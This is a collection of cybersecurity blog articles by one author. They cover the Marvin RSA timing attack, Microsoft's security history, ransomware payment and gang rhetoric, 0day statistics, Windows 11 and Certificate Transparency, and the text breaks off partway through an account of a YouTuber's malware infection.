Sergio de los Santos

Sergio de los Santos

Innovation and Laboratory Director at Telefónica Tech. Engineer in computer systems and master's degree in software engineering and artificial intelligence from the University of Malaga.

Cyber Security
Marvin, the cryptographic bug that will never be fixed
There has been a flaw in the fundamental RSA encryption algorithm for 25 years. It reappears from time to time under different names and in different forms. They have been re-analyzing the problem for three years and have discovered, among other things, that it will never be fixed. They have had to make such impressive achievements such as being able to perceive changes in processing time of the order of a few CPU cycles difference in response, across a network in production for miles by hopping six routers along the way. They have christened it Marvin. In the novel "The Hitchhiker's Guide to the Galaxy" (from which the term "42" also comes from), Marvin is the Android that lasts until the end of the universe. The bug dates back to 1998, when Daniel Bleichenbacher discovered that error messages thrown by SSL servers when processing the padding of the PKCS#1 (v1.5) format allowed attackers to decrypt the pre-shared key. Understanding the original bug is not that difficult and helps a lot to see why Marvin is a new-old problem. Where is the problem coming from? PKCS#1 is a format used within the RSA algorithm set that formats messages when they are too short. Padding is used to prevent them from being easily decrypted. In SSL/TLS a message is sent as a pre-shared-key, which is not very long and therefore must be padded to the length of the module. If the pre-shared-key is 48 bytes, then whatever remains up to 256 bytes (2058 bits key) is padding. All concatenated information is filled with this information: 0x00 + 0x02 + random numbers always non-zero to fill in+ 0x00 + swap-key. The 0x00 and 0x02 mark the beginning. The SSL/TLS server will thus know that the message starts, that it must delete everything up to zero and then from 0x00 onwards it keeps what it is interested in. The SSL/TLS server is used as an oracle for the attack. It is constantly bombarded with random strings and depending on its response to whether the padding is correct or not, we are guessing data. This was the origin of Bleichenbacher's original paper describing "the million message attack". Given the way RSA works, the attacker must clear the m from this equation. ms (mod n) Where s are the random messages you send. The server "oracle" will receive the completely random string s as if it were encrypted, it decrypts with the key that the server knows but we do not. If we are lucky enough that when decrypting the random s, we get a 0x00, 0x02 at the beginning and then a bunch of random data without a zero, and after the 0x00 a string (something that will happen every 30,000 or 130,000 attempts) the server will respond that it is well formatted, but it is not encrypted with the right password. And with that binary response, even if the message was not decrypted properly, the attacker will have managed to narrow down the range of possible keys. Clearing the equation, the result of ms (mod n) will be in a very specific range that the attacker can continue to narrow down with more and more questions to the server. After several million queries, it might know the answer. But what if the server doesn't respond – no oracle? That's when side channel attacks come into play. Even if it doesn't respond, there may be millisecond differences in its response if, although incorrect, the message is well formatted. These slight time differences will give you the clue. This is an important detail to understand Marvin. Successive attacks Further improvements were made to PKCS to counter this attack, so that completely random data could not be sent, and the padding obeyed a circumstantial hash (RSA-OAEP). However, with slight differences, the attack was still possible thanks to time side channels and that many SSL servers still use PKCS 1.5. In fact, a variant of the attack was discovered in 2018. They called it ROBOT, "the Return of Bleichenbacher's Oracle Threat." Many servers were vulnerable. An attempt was made to fix it, playing with the timing. ROBOT showed that the mitigation implemented for the original bug was implemented incorrectly and attacks with the same basics as the original were still possible. Successive fixes so that slight millisecond differences in server responses did not help the attacker were thought to be sufficient. But no. Marvin, this new attack, which in reality is basically the ROBOT attack but more precise, has come to give it a major twist. They suspected that since 2020 the error would still be there, and they started an investigation that concludes that, thanks to much more exhaustive measurement and more precise statistics, there is no solution, because implementing it for "Marvin" is even more complicated than ROBOT. Time-based side channel attacks Fundamentally, what they have achieved is precision with timing. They haven't invented anything. Simply put, it was believed that timing attacks (from a side channel) were no longer possible because they wouldn't provide any clues to the attacker due to their insignificance. It was agreed that as long as the responses remained in the order of nanoseconds, they would no longer be considered exploitable. According to the discoverers, however, it wasn't testing well. It took them three years to increase the amount and accuracy of testing until they were able to perceive differences on the order of a few CPU cycles difference in response, across a production network for miles, hopping six routers along the way. All thanks to sufficient data available and better statistical techniques. Impressive. For instance, in GnuTLS a time difference in the response was leaked in other parts of the code (the one that decided what kind of error to show if the debug was active). Implementing a workaround for this involves modifying the software too much, and in practice, impossible. These imperceptible details have resurrected side channel attacks that were thought to be dead. Therefore, having discovered that since there is no possible implementation that is "side channel free", anything that uses padding in RSA with PKCS#1 v1.5 could be susceptible to attack with this new method. It affects almost everything: OpenSSL, GnuTLS, Mozilla's NSS (even after the patch, according to the discoverer), M2Crypto.... The solution? Stop using PKCS#1 in RSA for TLS (TLS 1.3 already does it, abandon all padding as much as possible after many patches in its previous versions). Nowadays it is also possible to switch to ECDSA instead of RSA. Cyber Security Four cyber security milestones that shaped the future of malware May 22, 2023 Image from Fabrikasimf on Freepik.
October 11, 2023
Cyber Security
Four cyber security milestones that shaped the future of malware
In early 2001, Bill Gates sent out a memo (a shorthand for sending a company-wide email) that marked a historic moment. He acknowledged that, "...he had come under fire from some of his largest customers (government agencies, financial companies and others) for security problems in Windows, problems that were being brought to the forefront by a series of self-replicating worms and embarrassing attacks." So something was supposed to change, drastically. Put the focus on Cyber Security. Get away from those "self-replicating worms." Windows was threatened by malware that would seem like a joke today. At the end of that same year, Windows XP was launched, and things got worse. More attacks and more problems. Windows XP (2001) Image: Microsoft. But the strategy germinated. It took many years before they were able to reap some fruits of that initiative... because there were some. Let's review the pillars on which the initiative was based to change course. Microsoft has spent 15 years consolidating a strategy that has impacted cybersecurity globally. Active measures and secure development The "self-replicating worms" were simply malware that, taking advantage of any bug shared among all Windows, allowed them to run and infect others. Exponential growth. Those bugs were essentially code vulnerabilities. And so, the enemy was not so much each individual virus or worm, but to fight against the vulnerabilities that made it possible for them to replicate in each Windows connected to the network. And against that it focused on its next operating system: Windows Vista. It was supposed to be released in 2004 but wasn't until 2006. It was delayed by the attempt to make it more secure. One of its great achievements was to incorporate ASLR, which prevents the same bug from being exploitable in the same way in all Windows. In other words, it eliminated the possibility of "self-replicating worms" being programmed. And, except for horrible exceptions such as Wannacry, which managed to evade ASLR protection, it is true that in general this plague was largely eradicated. With Vista, despite its bad reputation in usability, substantial progress was made in basic technologies to fight malware and its way of exploiting bugs. It laid the first stone. The new system project did not come to fruition until Windows 7, but it laid the groundwork. With Vista, Microsoft laid the foundations for an effective fight against malware, although this did not happen until Windows 7. Although many users did not realize it, from that year onwards, the server version of Windows and the system's internals began to contain a good handful of measures aimed at eradicating how the most common vulnerabilities were exploited. More or less effective technologies such as CFG, MemGC, CIG, ACG... are quietly making their way to protect us. Although, as is often the case with defensive technologies, they attract more attention because of their failures than their successes. All these functions were programmed under the umbrella of a secure development methodology called Secure Systems Development Life Cycle, a way of programming that put cybersecurity at the center. This more secure programming project will also be complemented when some of the code is moved from C to Rust to alleviate the burden of memory management that causes so many bugs. The Blue Hat Prize Microsoft used to offer bounties to hunt down malware creators until 2011. Usually, $250,000 for anyone who offered a clue that would lead to the arrest of the creator of a major virus of the moment. MyDoom, Conficker, Blaster... It was not a sustainable strategy. From 2011 onwards, something completely different was proposed. It decided to award $250,000 to any researcher who offered a technical improvement in Windows to stop malware. Invest in techniques and protection measures instead of punishment. And so, it did. Windows 10 (2015) Image: Microsoft. Since then, they implemented many formulas that today in Windows 10 help make it harder for malware to replicate, and they did it by listening to the community and researchers. Antivirus included in Windows Microsoft announced in June 2003 that it was acquiring antivirus technology. The antivirus houses looked askance. A default antivirus in Windows? Despite all the doubts, the company finally made a good move. It introduced a very simple tool (Malicious Software Removal Tool), which was launched from time to time on the system and removed the most popular viruses, nothing too advanced. What was Microsoft's intention with this move? The goal was to take care of users, but also to capitalize on metadata. What it got was a good snapshot of the malware that was "out there" and so it knew firsthand what was going on in its most unprotected systems to, again, improve its defenses. Then came Windows Defender, which began to be resident and still managed to coexist with traditional antivirus. Later Windows 10 has turned Defender into a whole security strategy in the operating system. "Defender" is an umbrella that brings together a global cybersecurity policy of Microsoft not only on the desktop but also in the cloud. EMET and Windows 10 In 2009 a tool called EMET was launched, aimed not so much at detecting viruses (of which there were millions), but at thwarting the techniques they used to spread (of which there are only dozens). It was free and almost "amateurish". However, its importance grew and after six years of development it was abandoned in favor of including its improvements as standard in Windows 10. Thus, it incorporates improvements to stop the exploitation of vulnerabilities and therefore malware that have proven their effectiveness in a non-"production" environment. Although little known, it is a tool that really scared attackers and today, incorporated as standard, have made Windows 10 much less palatable to malware. So, what does this mean? The moral is that a solid cyber security strategy, with several open fronts, global and in a changing environment, does not reap rewards the first time around. It took Microsoft almost 15 years (from 2001 when the memo was written to 2015 when Windows 10 came out) to consolidate a strategy that has impacted cybersecurity globally and, in the meantime, of course, they have suffered failures and many new milestones and challenges to address. This is a sliding window, but good ground has been gained. The threat has not disappeared but has mutated into something that must continue to be fought with other weapons and will need new and better strategies. But those arguments, or the never-ending long-distance race that is cyber security, should not be enough to make us forget that it is never too late to start an ambitious strategy. The only failed cybersecurity strategy is the one that is not implemented. Featured photo: Ed Hardie / Unsplash.
May 22, 2023
Cyber Security
Pay When You Get Infected by Ransomware? Many Shades of Grey
The Internet is full of articles explaining why ransomware should not be paid. And they are probably right, but if you don't make a difference between the type of ransomware and who is affected, the reasons given may not make as much sense. It is therefore necessary to explain the circumstances of the person concerned in order to understand why payment should not be made and, above all, to understand the situation well in order to make the right decisions. Two Types of Ransowmare The first thing is to come clean about the fact that there are two types of ransomware. "Domestic" attack The first appeared massively around 2012, as a natural evolution of "police virus" malware and affected the average user. Since 2017, it has not disappeared, but its incidence has fallen considerably. They were attacks on unsuspecting random victims who asked for large amounts that could be dealt with by an individual. This type of 'domestic' attack has perhaps a more direct response: it should not be paid unless there is a good reason to do so. No one guarantees that the files will be returned (an amusing example is this anecdote in which, despite not having actually infected anything, the attacker still insisted that he should be paid). Nor does anyone guarantee that the victim will be extorted again. And most of the time, it is more than likely that the user can continue to live without his many files, data, etc. But... what if your business, livelihood, clients and future depend on recovering that data? Then the answer turns more complicated. Professional attack Since this is not the time to blame the victim (he has enough already) because his backup was also encrypted, did not work, or simply did not have any. In a professional ransomware attack everything is more complex, we are talking about campaigns that could have involved months of work and study from the attacker, with the sole objective of entering the entrails of the network (sometimes enormous) and, at the right moment, taking control and encrypting everything. By then it is too late. Image by DCStudio on Freepik. The whole system is encrypted and sometimes it takes months to check not only that the system has been recovered but also that the attackers cannot get in again. Here, every day thousands and thousands of euros are lost because of the frustrating impossibility of running the business. The situation is much more critical and serious, and that is why the attackers are asking for millions of euros for the rescue. In that moment a negotiation begins, because when there is so much at stake, not paying is not something that is dismissed immediately. Just as in real life when kidnapping happens, payment is an option that is always considered. But it is always the last option. In fact, it is an option that may end up being officially illegal. In July 2019, the US mayors' confederation at its annual meeting recommended not to pay. If you pay, you encourage them to keep attacking, they said. In that case, the statement did not go beyond a purely "moral" position, as it was not binding. Then it went further, two proposals by two senators (one Democrat and one Republican) contemplated in January 2020 that it would be forbidden to spend public money on these bailouts. The Republican senator also proposed the creation of a fund to help organisations improve their cybersecurity. It keeps going further The Office of Foreign Assets Control (OFAC) now reports that "companies that facilitate ransomware payments to cybercriminals on behalf of victims, including financial institutions, insurance companies and companies involved in forensic analysis and incident response, not only encourage future ransomware payment claims, but also risk violating OFAC regulations". The aim would be to fine both, those who pay, the intermediaries and those who receive the money (if they can be identified). Cyber Security The role of "Threat Hunting" as an enabler in ransomware incident response February 8, 2023 More Figures Than You Can Imagine Actually, the recommendation is that instead of paying, one should collaborate with the law and order forces and not involve "cover" intermediaries on the grounds of already committing something illegal and criminalized. The reason? Many more affected than we think are paying, to the point that the payment process itself has become a business. Image by Pressfoto on Freepik The payment process itself has become a business. The ransomware business has become industrialised both from the point of view of the attackers (very elaborate techniques, very professional treatment...) and from the point of view of the victims, who are already using intermediaries and other divs as insurers to deal with the crisis. When business continuity is critical, the companies affected set up various channels. Of course, the technical recovery attempt, damage assessment, etc. But other "diplomatic" channels are also initiated, which may include contact with the attackers and other companies. With the attackers, you bargain and negotiate, establishing a line of dialogue as if it were any other type of transaction. Extortionists may even offer useful advice after the victim has gone through the checkout line. And like any negotiation, it can be delegated. Cyber Security Cybercrime, a constant threat to all types of companies March 29, 2023 The intermediaries In the light of this murky business of extortion, intermediaries who offer "consulting" services have emerged dealing with the negotiation and the payment of the ransom. In this industrialized scenario, payment usually does guarantee recovery. Even going further, insurers can act as intermediaries. These businesses may find it more rewarding to pay the attackers than the affected party for the damage suffered, depending on what their insurance covers. In short, a complex web where not everything is so clear when we talk about divs and above all very distant from the domestic environment where the guidelines are usually clearer. The new laws in the United States seek to strangle the extortionists by preventing their business from being lucrative... but this measure may not be enough because many times the continuity of legitimate businesses is more important. Survival... not at any price, but at the one imposed (unfortunately) by criminals. Featured photo: Omid Armin / Unsplash.
May 9, 2023
Cyber Security
Hypocrisy doublespeak in ransomware gangs
The hypocrisy, doublespeak and even, we assume, sarcasm that ransomware gangs display on their websites has no limits. As an anecdote, we are going to show some of the statements or terms used by ransomware gangs to justify their services, as if it were not a full-fledged illegal extortion. We assume that the intention of the attackers is similar to classic mafias. Far from outwardly acknowledging their illegal activity, the intention is to cloak the attack in some (albeit perverse) logic in which the victim becomes a "client" of the ransomware gang or even guilty of the extortion itself for not caring about their data or infrastructure. Here are a few examples after taking a look at their websites Babuk, a double standard They attack everything they can and are very active and popular. They have a special grudge against Elon Musk. If they were to get into his systems, they would publish it without negotiation, they say. But they have a red line: hospitals, NGOs, schools and small companies with profits of less than 4 million. Interesting difference that is not found in many other groups. Image: Organisations safe from Babuk Babuk spend a lot of time “justifying themselves”. Image: Babuk's philosophy They call themselves cyberpunks who go around " testing cybersecurity". Of course, they literally call themselves "specialised, non-malicious software that exposes a company's cybersecurity problems". They add that their "audit" is not the worst thing that could happen, and that it would be much worse if fanatic terrorists who don't just want money, like them, were to attack the infrastructure. Lorenz, nothing personal They don't talk about their morals; they attack as much as they can. On their blog they keep a slot with the attacked companies that have paid (and therefore removed their data), and others with the data published for not having paid. Image: slots for future or victims who have already paid But they remind on their website that of course, it is nothing personal. Just business. LV, you are the one to blame If LV attacks the company, encrypts and steals the data and ends up displaying it on its website, it is the victim's fault for not having fulfilled their obligations and refusing to correct their failures. They have preferred to sell the company's own data and that of its customers. This is the cynical message of this gang that blames the victim as if they had done something wrong. It is worth remembering here that ransomware gangs do not always exploit security flaws: they use all sorts of techniques, such as extorting workers to get the data they need for the theft. Image: LV says the victim is careless LockBit, the most professional They are so professional that they recently announced a Bug Bounty of their own in which they could award up to a million dollars just for finding bugs in their infrastructure. They are very active and very good at marketing themselves as an affiliate campaign for ransomware, with very advanced encryption and exfiltration software, fast and very serious about their business. That's what they say. On their FAQ page, we can find statements like these. Image: What to target and what not to target Neither they nor their affiliates can encrypt critical systems such as nuclear plants, pipelines, etc. They can steal information, but not encrypt it. They can steal information, but not encrypt it. If in doubt, they can contact the organisation's helpdesk. They are also not allowed to attack post-Soviet countries, although this has long been common in malware. They do allow NGOs without problems, and educational institutions as long as they are not public. They recommend not attacking hospitals if they can cause deaths. And they encourage attacking as much law enforcement as possible, because they say they don't appreciate the important work they do in raising awareness of cybersecurity. If the victim doesn't pay up, they promise to store the stolen company data available on their blog for as long as possible, so they can learn. And so that they can't take down this website they maintain a very robust antiDDoS system with dozens of mirrors as well as the aforementioned bug bounty to find potential flaws in their encryption system that could allow access to the data without paying. Bl@cktor, the ransomware gang that claims not to be one It's not that they're a ransomware gang, it's that they love to go around looking at vulnerable companies, break into their systems, and ask for ransom money. But they don't mean any harm... unless you don't pay, of course. Image: Bl@ckt0r, neither numbers nor deletes And they don't lie. They don't actually encrypt anything; they leak the data directly and sell it. This way they do not break business continuity. According to them, a bargain for their services as they have alerted about potential security breaches. They also seem to have a lot of resources to make everyone aware that the data has been stolen. For instance, contacts in the media. Hospitals, of course, are not touched. Main image: Tyler Daviaux / Unsplash. * * * Cyber Security How Lokibot, the malware used by Machete to steal information and login credentials, works June 29, 2022
July 14, 2022
Cyber Security
0days in numbers: Chrome, Windows, Exchange... What are attackers and manufacturers looking for?
Very interesting data from Google's Project Zero, which tries to catalogue, find and disseminate 0days. They do not discover them directly, but "detect" them in any manufacturer when they are being exploited if the manufacturer so declares. They can then analyse, alert and correct in order to close the door to attackers as soon as possible. They advocate for proper 0day cataloguing and transparency to improve the community. For example, the starting point is for manufacturers to properly label their vulnerabilities (whether they are in-the-wild) or not when they are detected or corrected. This year they have detected 58. The previous record was 28 in 2015. Project Zero has been working since 2014. 0days are vulnerabilities found when already being exploited by attackers and, therefore, without a known patch The numbers from this tracking are rather interesting. If we divide them by major manufacturers during 2021, they would look like the following chart. 0days reported by vendor in 2021 Source: Project Zero Does this chart mean that Chrome has more flaws and is more vulnerable? Not at all. In fact, there is so much information to be gleaned from this chart that it is necessary to break down the argument. Chrome 14 0days reported in 2021. Undoubtedly, the browser is the one that has been attracting the greatest interest from attackers for some time now. Firstly because of the number of new attacks they carry out, and secondly because it is known that bypassing Chrome's sandbox has always been a technical challenge. Now, however, it is even more of a challenge because Edge uses Chromium and some of the bugs may be shared. Six of these bugs were in the V8 JavaScript engine. Webkit (Safari) The first full year that Apple reports 0days as such in Webkit. And that makes 7, so you can't really establish a trend. Certainly a lot compared to its market share, but we already know that it's a juicy target on iPhone phones above all. Again, 4 of them in the JavaScript engine. Internet Explorer Yes, it still matters, given how embedded it is in the system and as a consequence it is still Office's HTML engine. In addition, there are always 3 or 4 0days on a constant basis since 2015. Windows 10 0days. The funny thing is that until now, the vast majority of them were attacking win32k to escalate privileges. Up to 75% of all 0days in previous years. In 2021, only 20% are attacking this driver. Why? Because these attacks were aimed at versions prior to Windows 10. With its disappearance, this module becomes more complex to exploit. Although it may not seem like it, in this respect, Windows 10 is more heavily shielded. iOS/MacOS Always hermetic, this 2021 has been the first year in which Apple has reported 0days as such in its operating system. And there have been 5 of them, one of them (the first) on MacOS (so far all of them on iOS). Once again, iOS is a very interesting target for attackers in high geopolitical spheres. Pegasus is an example of this. Cyber Security Windows 11 security improves and joins Zero Trust April 18, 2022 Android We have gone from a single 0day in 2019, to none in 2020 and 7 in 2021. And out of these 7, 5 bugs in the GPU driver. Since Android operating systems are highly fragmented, it is difficult to make a working exploit for most flavours of operating systems. However, a flaw in the GPU driver allows an attacker to need only two exploits. One for the Qualcomm Adreno or one for the ARM Mali GPU. It is curious how not only in Android, but in all other platforms, the most valued for attackers are privilege escalations. Why? Because getting the user to execute is relatively easy thanks to social engineering. Exchange Server The big star of 2021. The first time it appears since 2014 and it does so with 5. It is also true that 4 of them were part of the same operation or campaign related to ProxyLogon. Conclusions It will never be known how much is unknown, or what portion of those 58 of the total number of 0days attackers are using. At least this year is the first year in which Apple has committed to labelling its vulnerabilities as known in-the-wild for Webkit, iOS and macOS. Most of these 58 0days follow very similar practices as they always have: they build on known exploits and vulnerabilities to develop new and derivative exploits. Only two were new in their techniques and sophistication. And this is quite relevant. Because as long as known methods, techniques or procedures are used, they are theoretically easier to detect because they are "expected". This is where the industry should improve. Another conclusion is that these numbers show us something that is incomplete, part of a full map we do not know. These are only the vulnerabilities declared as 0days detected by the manufacturers. There will certainly be more, but we don't know how many. Google's call for all manufacturers to report their 0days as such is of great help for analysing the industry itself.
April 27, 2022
Cyber Security
Windows 11 security improves and joins Zero Trust
Windows 11 has just announced, despite already being on the market since October 2021, its improvements in cybersecurity. We are going to analyse the new functionalities, some of them old and even known, but applied by default or substantially improved. Of course, the overall strategy had to be based on the fashionable concept of Zero Trust and hybrid work in several layers, and this is how they have organised it. Let's analyse them roughly as there are not yet too many technical details known. Image: Zero Trust Approach in Windows 11 Hardware: Pluto Pluto is a processor solely dedicated to security and is embedded in Qualcomm and AMD Ryzen versions. That is, a TPM directly in the processor that stores e.g., BitLocker or Hello ID keys. What is it for and how does it improve on current TPMs? The fact that it is embedded prevents someone from physically opening the device and "sniffing" from the bus the information that travels from the TPM to the processor. After all, as complicated as it sounds, it is possible to trap BitLocker passwords by connecting a piece of hardware to the processor and reading this traffic with a certain program. In fact, during the official presentation of the functionality, there is a quite practical demonstration of the attack process. The attack to get the BitLocker password of a computer to which you have physical Access Windows 11 does not work without TPM devices, but now it can also benefit from that TPM on the processor itself. In addition, Pluto's firmware will be controlled by Windows' own updates. Indeed, it will be made open source so that it can be used by other operating systems. Config Lock Config Lock is simple to explain. In MDM-managed systems, there was already Secured-Core PC (SCPC), a configuration that allowed the device to be controlled and managed by administrators in companies. Using Config Lock, there will be no window of opportunity between the time of a user-perpetrated change to a security setting and the enforcement of the security policy imposed by the administration. If the user disables any security system, it will immediately revert back to the site as condivd by the policy designer. The configuration is thus "locked" and does not need to wait even minutes for it to be reversed. Personal Data Encryption An interesting new feature. It basically encrypts files over BitLocker, with a layer of encryption that is also invisible to the user. But the user does not have to remember or execute anything to decrypt his data but can access the data without any problems when logging in with Hello in Windows. If the user has not logged into Windows with Hello, the files will be encrypted and cannot be accessed. What is this for? As the example in the presentation says, it prevents attacks that bypass the lock screen through direct access attacks to unprotected DMA memory. An attacker who has not authenticated to the system through the "usual" channels, but has bypassed the lock screen, will not be able to access the files thanks to PDE. One layer above BitLocker's cold encryption is PDE for hot encryption. The PDE password is not known to the user, it is simply erased from memory when the system is locked and decrypted when unlocked with the usual login. It would also serve as additional security if the attacker bypasses BitLocker. It seems to clash or overlap somewhat with the EFS functionality. How is this implemented? If the attacker tries to log in without being authenticated as a user (by bypassing the lock screen or mounting the disk on another computer), a closed lock would appear on the files and a message prohibiting access would appear. File cannot be accessed thanks to PED Smart App Control SAC seems very much oriented towards checking the signature and certificates of the manufacturer of the binaries. It will try to determine if it is correct (with its valid and correct certificate), before even going through Windows Defender to add an extra layer of security. SAC is AI-based, which implies telemetry. Microsoft seems to be moving towards requiring by default that programs are signed or downloaded from a trusted repository, as MacOS or Android already do. It improves the usual SmartScreen where Windows, thanks to its telemetry, tells you whether an app is legitimate or not. It also improves AppLocker which is more static. SAC will be based on AI hosted in the cloud, learning from the user. In fact, for those who want to activate it, it requires a reinstallation of the system so that it can learn from the beginning what programs are common on that computer. Smart App thinks the application is untrustworthy and sends you to the official Store Enhanced phishing protection for Microsoft Defender This is perhaps one of the most interesting measures. SmartScreen has so far, via the browser (or in professional versions, by other means) protected the system from a malicious URL, or a suspicious domain. Just for the sake of comparison. Now it goes further, and Windows protects passwords on several levels, always watching where they are used or sent. Whether it is a visible URL, an internal URL (to which URL they travel) or even if they are stored insecurely. On the one hand, it observes the network connections in any application (including Teams) and if it concludes that the password travels to a domain that it should not, it alerts the user, even if it is not the main URL of the domain being visited. The image shows how a page pretending to be the Office login embedded in TEAMS is actually (the connection is highlighted in the Fiddler sniffer) carrying the Office password to another domain. Process of detecting that the password travels somewhere else it shouldn't However, it goes further. If you happen to store passwords in a TXT file in Notepad, you will be alerted to the error. Even worse, if you reuse a password known to the operating system (in the picture, for example, on LinkedIn), it will also alert you to the problem it could pose. This way, Windows as an operating system does not treat the password as just another string but knows it at all levels and monitors it throughout its use within the operating system. Could it lead to false positives with password storage apps? Alerts when reusing the password on Linkedin and when storing it in a TXT All these options can be disabled by the user. How to activate or deactivate these functions Windows 11 also enables by default VBS, or virtualisation as a security feature. Since the inclusion in 2008 of Hiper-V, Microsoft's software that takes advantage of the native virtualisation capabilities of Intel and AMD processors, this functionality has been targeted to improve security. In fact, this strategy is called Virtualization-Based Security or VBS. It focuses on virtualising memory to isolate processes from each other as much as possible. If an attacker tries to exploit a flaw in the kernel and is operating from there, an even higher (or lower, depending on how you look at it) abstraction with even more power than the kernel would be available, which would allow preventing processes or access to certain resources even when the attacker already has powers in the ring0. Hence its usefulness. This is implemented with hypervisor-protected code integrity (HVCI) which would prevent injecting dynamic code into the kernel (as Wannacry did). In turn, this will allow the Credential Guard (not new, but underutilised) and LSASS protection to work directly, so that it does not load unsigned code into this crucial process, which is also an old acquaintance (RunAsPPL in the registry, basically a protection against Mimikatz). All of these, despite being already known, will be enabled as standard in Windows 11.
April 18, 2022
Cyber Security
Google takes a step forward to improve Certificate Transparency's ecosystem: No dependence on Google
Although Certificate Transparency (CT) is not very popular among ordinary users, it affects them in many ways to improve the security of their connection to websites. What's more, it even affects their privacy and they certainly weren't taking this into account. Now Google (the main promoter of CT) is taking a step towards independence from the ecosystem, but it must still improve its privacy problems. What is Certificate Transparency? Let's make it short. If a certificate is created, it must be registered on public log servers. If not, it will be suspected to have been created with bad intentions. To "register" it, a Signed Certificate Timestamp, or SCT, is created, a signed cryptographic token given by a Log server as a guarantee that the certificate has been registered in it. This SCT is always embedded in the certificate and when visiting a website, the browser checks that it is valid against several log servers. One of them must be from Google (there are several certificate companies that have public logs). If this is not the case, an error is displayed. All this happens without the user being aware of it. An SCT embedded in the certificate, which the browser must check. However, the SCT is more of a promise to put the certificate in the log, because nothing prevents a log operator (who can be anyone) from agreeing with an attacker, creating a certificate, granting him/her an SCT... but not actually making it public in his/her log. This would invalidate the whole CT ecosystem. How did Google solve it? Through two moves. One is that there always had to be a "Google Log" among the required ones (currently three) where the certificate was registered. This way, Google trusts itself and knows that it will never do wrong by sending an SCT to a certificate that it has not actually registered. The other one is "SCT auditing", which, if poorly implemented, would imply a clear infringement of users' privacy. Both solutions have their problems. Let's look into them. Chrome showing the three logs where the SCT is valid. Always a Google one... until now. At least one Google Log If Google doesn't trust other logs, why should it trust its own? Because it is the best solution it found at the time. A certificate will not be considered to be validly compliant with the Certificate Transparency ecosystem if it is not in a Google Log.... At least until this month, where that need has been removed. This will be implemented in Chrome version 100. It is worth remembering that Apple already went its own way with Safari, and in March 2021 announced that it would not follow that policy of relying on Google, that knowing that the SCT was in two different logs was enough for it. Privacy and SCT auditing SCT auditing also came not long ago as one of the solutions to control the SCTs and make the logs really perform well. It is simple: randomly audit the SCTs of the certificates and check that they are really in the logs. But how? Well, as Google knows best: using the user and taking advantage of Chrome's adoption to send the SCTs of the sites visited to the logs to check that they have indeed been registered. There was a lot of talk about SCT auditing, but it really was an attack on user privacy and a problem to implement. But they did it again in the March 2021 version of Chrome, in the best way they knew. How? They enabled SCT auditing only for users who already shared, through the enhanced data sharing that can be done with Safe Browsing, their visits with Google. As this was something that users activated voluntarily, they were also added as "SCT auditors" in passing. It is not the default option. Announcement of how SCT auditing would work The two formulas described above help to control that a malicious log does not issue an SCT for a certificate without being logged by that same log. But SCT auditing must have worked out well for Google since it seems to eliminate the first formula and (as Safari already did) from now on one of the logs does not need to be specifically from Google. Therefore, in order to ensure that the Logs, we are left with SCT auditing where all users who already share certain browsing data with Safe Browsing are also ensuring a more secure CT ecosystem in turn. Firefox does not implement Certificate Transparency.
April 12, 2022
Cyber Security
Chronicle Of the Attack on A Youtuber Who Knew About Cyber Security
The news recently broke: youtubers with the largest number of followers are being targeted for extortion. The attacks are on the rise and the techniques are not new, but for some time now, these attacks have been detected and continue to increase. In fact, since a little more than a year ago, when this story occurred. The beginning of the attack This youtuber has more than 700,000 subscribers and is well known in the sector. His daily business is dealing with suppliers, manufacturers, advertisers... who send him emails with attached documents. He knows perfectly well not to click on links to unknown domains or downloads, he uses antivirus to check office documents and PDFs, and he does not trust those who come in through the cold door. He uses two-factor authentication on all his accounts and... a friend to call in case of emergency. One day he received an email from a supplier with whom he had been exchanging emails for several days. He didn't know him, but the relationship had been established. He was actually the attacker, and he had bothered to talk to our youtuber, propose the business and wait for the right moment (several days) to send him a supposed video. The file weighed 65 megabytes, so he sent the youtuber a link to Dropbox, which he downloaded to his computer. Still, he didn't trust it. He looked at the extension, he knows he shouldn't launch executables. The extension was SCR. The attacker didn't bother to use a double extension, but he might as well have. Still, our youtuber did condiv Windows to display the most popular extensions. The file icon represented a video. What is SCR? he asked himself. He googled and found that it was something to do with screensavers. It might make sense, being a video, he thought. Then he right clicked on it with the intention of scanning it with his antivirus. Nothing, he didn't detect it. He saw something curious. "Test" in bold, could he test the file before launching it? It made sense to him, he concluded that it would be a good security measure to "test" this SCR before running it. Besides, he doesn't work with the administrator account and it had already been scanned by the antivirus, which made him feel safer. So, he ran it as a "test". What he didn't know is that he was running it. SCRs are executable extensions in every sense. Screensavers (and this is a little-known thing) have the possibility to run as "test” and can be tested on any Windows. But there is really little to test... launching an SCR in "test" is the same as executing, and therefore the whole malware payload is launched in exactly the same way. The video icon is trivial to insert into the file and the 65-megabyte weight is artificial, pure filler, to enhance the impression that it is a video. The youtuber was already infected. The suspicion and the call The alleged video did nothing, it would not run. And this alerted our youtuber. Something was going on, as the system CPU was reaching 100% at times. He looked at the screen, trying to kill some process, but he wasn't sure what the malware was or what it was doing. After a few minutes he decided to shut down the computer and call me personally. He told me what had happened, the alleged video, the precautions... I told him to immediately change all the passwords, while we were talking, to do it from a different mobile or tablet and to protect his channel. But I have two-factor, he said. I told him that it didn't matter, that they could have stolen his session with cookies. That the SCR could have actually sent the attacker all the tokens of the open sessions in the browser and, if he (the attacker) was attentive at the time, he could get access to his accounts. In fact, he told me that the attacker specifically asked him to tell him when he would more or less watch the video as he was in a hurry. I asked him if he stored any passwords in his browser and he said no, thank goodness. While I was warning him about this, he tried to change some passwords. He had trouble remembering all the identities he used online, he didn't have a step-by-step emergency procedure, and now he was regretting it. But in the middle of the call... he got cut off. I stopped hearing him. I tried to call him but there was no way, the phone wasn't on. It was as if he had suddenly switched everything off completely. Although it was strange, I thought his battery had run out and he couldn't charge it at that moment. After about 15 minutes he called me back. This time he was really scared. The attack He told me that, while he was talking, the phone had rebooted and started reformatting while in his hands. It was an Android. He felt he was being watched, he was really panicking. Do you use the "Find my device" service? I asked him. Yes, of course, he replied. It was clear that the attacker had accessed the Gmail account associated with the phone and requested a remote format of the Android. Is that the same account you use for YouTube? No," he said. That account is just for the phone! Well done. It was just one of the accounts he hadn't changed the password and logged out of. The only one the attacker had been able to access and was now desperately trying to inflict maximum damage. I asked for reassurance. He had a bootable USB stick with a Linux distribution, so I guided him through running an antivirus, deleting the malicious file (which was gone) and potential aftermath, recovering some documents, and so on. He had no faith, so finally after recovering his data, he decided to format his Windows. We went through, once again, all his accounts and, on a completely new system, he finished changing and tidying up his passwords. I didn't recommend formatting the Android because the attacker had already done it. Conclusions Our YouTuber did a lot of things right: He had two-factor authentication. He trusted no one. He questioned files and submissions. He did not store passwords in the browser, and segmented accounts (one for the phone, one for the channel...). He had 